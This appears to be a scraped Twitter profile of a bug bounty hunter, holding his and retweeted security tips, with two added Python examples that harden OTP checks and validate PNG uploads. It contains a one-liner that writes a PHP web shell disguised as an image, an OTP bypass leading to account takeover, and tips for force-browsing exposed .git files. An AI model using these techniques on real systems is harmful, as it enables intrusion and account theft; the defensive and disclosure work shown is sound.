Sagar Sajeev (@sagar__sajeev)'s Twitter Profile
Sagar Sajeev

@sagar__sajeev

| 19y/o | Security Researcher | Bug Bounty Hunter |

ID: 1257325849683976200

https://sagarsajeev.wordpress.com 04-05-2020 15:07:07

43 Tweets

471 Followers

249 Following

Sagar Sajeev (@sagar__sajeev)

I reported this very interesting Business Logic flaw and thought it would be good to make a small writeup on it. So please do read it and I hope it will be helpful. sagarsajeev.medium.com/business-logic… #bugbounty #bugbountytips #vulnerabilities #cybersecurity #infosec #cybersecuritytips

Sagar Sajeev (@sagar__sajeev)

#bugbountytips
redacted.com/.git -->403
redacted.com/.git/HEAD -->200
redacted.com/.git/objects -->200
redacted.com/.git/config -->200
Make sure you force browse these endpoints if you've got a forbidden git directory. May result in information disclosures. Happy hunting!

Sagar Sajeev (@sagar__sajeev)

Thursday Bounties⚡
Vulnerabilities Reported :
- Bypassed Cloudflare and Found Origin IP.
- Broken Access Control
Tip:-
lnkd.in/giP6b4pB
This tool may help when dealing with Cloudflare WAFs.
#bugbounty #cybersecurity #bugbountytips #redteam #vapt

Sagar Sajeev (@sagar__sajeev)

I just published a small writeup about Server Side Template Injection (SSTI) I recently reported. Here's the link to the writeup : sagarsajeev.medium.com/server-side-te… #bugbounty #bugbountytips #bughunting #cybersecurity #cybersecuritytips #infosec

Sumit Jain (@sumit_cfe)

A collection of useful Nmap NSE Scripts ... github.com/emadshanab/Nma… Cc Emad Shanab - أبو عبد الله #security #bugbounty #bountyresources #collection #bugbountytips #infosec #hacking #cybersecurity

Sagar Sajeev (@sagar__sajeev)

I found a very interesting case of OTP bypass leading to ATO.
1) Enter an invalid six-digit OTP and forward the request.
2) Intercept the response and there you will find the correct OTP encoded in base64.
3) Decode it for the correct OTP.
Impact: Account Takeover #bugbounty
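
The flaw described in the post above next to a server-side fix, as an added example that is not code from the original tweet or the affected application. The response field name `ref`, the policy constants and all function names are assumptions; the check `leaks_otp` is the regression test a defender would keep in CI.

```python
import base64
import hashlib
import hmac
import secrets

MAX_ATTEMPTS = 5      # assumed policy values, not from the post
TTL_SECONDS = 300
DEMO_KEY = secrets.token_bytes(32)  # per-deployment secret (constructed)

def verify_vulnerable(expected_otp, submitted):
    """Flaw from the post: the failure response carries the expected OTP.
    The field name 'ref' is hypothetical."""
    if submitted == expected_otp:
        return {"status": "ok"}
    leaked = base64.b64encode(expected_otp.encode()).decode()
    return {"status": "invalid", "ref": leaked}

def mac(key, otp):
    return hmac.new(key, otp.encode(), hashlib.sha256).digest()

def issue(key, now):
    """Return the OTP for out-of-band delivery and state holding only its MAC."""
    otp = f"{secrets.randbelow(10**6):06d}"
    return otp, {"mac": mac(key, otp), "expires": now + TTL_SECONDS, "attempts": 0}

def verify_hardened(key, state, submitted, now):
    """Constant-time compare, attempt cap, expiry, single use; no secret in reply."""
    if state["attempts"] >= MAX_ATTEMPTS or now > state["expires"]:
        return {"status": "rejected"}
    state["attempts"] += 1
    if hmac.compare_digest(mac(key, submitted), state["mac"]):
        state["attempts"] = MAX_ATTEMPTS  # burn the code after success
        return {"status": "ok"}
    return {"status": "invalid"}

def leaks_otp(response, otp):
    """Regression check: is the OTP present in any value as plain, base64 or hex?"""
    blob = " ".join(str(v) for v in response.values())
    forms = (otp, base64.b64encode(otp.encode()).decode(), otp.encode().hex())
    return any(form in blob for form in forms)

if __name__ == "__main__":
    otp, state = issue(DEMO_KEY, now=0)
    wrong = "000000" if otp != "000000" else "111111"
    print(leaks_otp(verify_vulnerable(otp, wrong), otp))
    print(leaks_otp(verify_hardened(DEMO_KEY, state, wrong, now=1), otp))
```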

Sagar Sajeev (@sagar__sajeev)

Do check out my new writeup on a File Upload Bypass leading to RCE. sagarsajeev.medium.com/file-upload-by… #bugbounty #cybersecurity #bugbountytips #vulnerabilities #redteam #infosec

Sagar Sajeev (@sagar__sajeev)

I reported this vulnerability which allowed the attacker to unsubscribe any user from the Target website’s email notification service. I've also published a writeup on that here: sagarsajeev.medium.com/unsubscribe-an… #bugbounty #bugbountytips #vulnerabilities #cybersecurity #infosec #redteam

Intigriti (@intigriti)

Finding blind XSS is hard, but let's make it a bit easier. Set this in Burp and wait until an admin views your User-Agent in a vulnerable application! 💉 Thanks 1bdool492 🔻 for this great tip! #bugbounty #bugbountytips 👇

Sagar Sajeev (@sagar__sajeev)

I've recently published a number of new bug bounty writeups over at my Medium handle. I forgot to update it here on Twitter. Please check them out and let me know your feedback. sagarsajeev.medium.com #bugbounty #bugbountytip #cybersecurity

Adam Langley (@buildhacksecure)

If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload.
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
#bugbountytip #ctf #hacking
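
Why a magic-byte check does not stop the PNG file from the post above, shown from the upload handler's side as an added example that is not part of the original tweet. The function names, the chunk allow-list and both sample byte strings are constructed for illustration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ALLOWED = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}  # assumed allow-list, drops text chunks

def naive_is_png(data):
    """Weak check that the disguised file defeats: first four bytes only."""
    return data[:4] == b"\x89PNG"

def strict_is_png(data):
    """Full 8-byte signature, then walk every chunk: allowed type, valid CRC,
    IHDR first, IEND last, at least one IDAT, no bytes after IEND."""
    if data[:8] != PNG_SIG:
        return False
    pos, seen = 8, []
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        end = pos + 8 + length
        if ctype not in ALLOWED or end + 4 > len(data):
            return False
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(data[pos + 4:end]) != crc:
            return False
        seen.append(ctype)
        pos = end + 4
        if ctype == b"IEND":
            break
    return (bool(seen) and seen[0] == b"IHDR" and seen[-1] == b"IEND"
            and b"IDAT" in seen and pos == len(data))

def chunk(ctype, body):
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def sample_png():
    """Constructed 1x1 greyscale PNG used as the known-good input."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")

# Constructed stand-in for the file from the post: PNG prefix, then script text.
DISGUISED = b"\x89PNG" + b"<?php /* placeholder */ ?>."

if __name__ == "__main__":
    print(naive_is_png(DISGUISED), strict_is_png(DISGUISED), strict_is_png(sample_png()))
```

Structural validation narrows what gets through but is not sufficient on its own: re-encode accepted images, store them under a server-chosen name outside any directory where scripts execute, and serve them with a fixed image content type.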

Sagar Sajeev (@sagar__sajeev)

Found this interesting script called LinPEAS which can essentially discover possible paths to escalate privileges on Linux or Unix machines. It can be particularly helpful in pwning CTF challenges. github.com/carlospolop/PE… #infosec #cybersecurity #CheatSheet #security #linux

Sam Curry (@samwcyo)

We recently found a vulnerability affecting Hyundai and Genesis vehicles where we could remotely control the locks, engine, horn, headlights, and trunk of vehicles made after 2012. To explain how it worked and how we found it, we have ꙅɿɘƚɔɘqꙅ as our mock car thief:

Anugrah SR 📌| #HackLearnDaily (@cyph3r_asr)

Now you don't have an excuse to start Complete a Practical Study Plan to become a successful cybersecurity engineer based on roles like Pentest, AppSec, Cloud Security, DevSecOps and so on... 👇

Sundar Pichai (@sundarpichai)

Seeing some qs on what Gemini *is* (beyond the zodiac :). Best way to understand Gemini’s underlying amazing capabilities is to see them in action, take a look ⬇️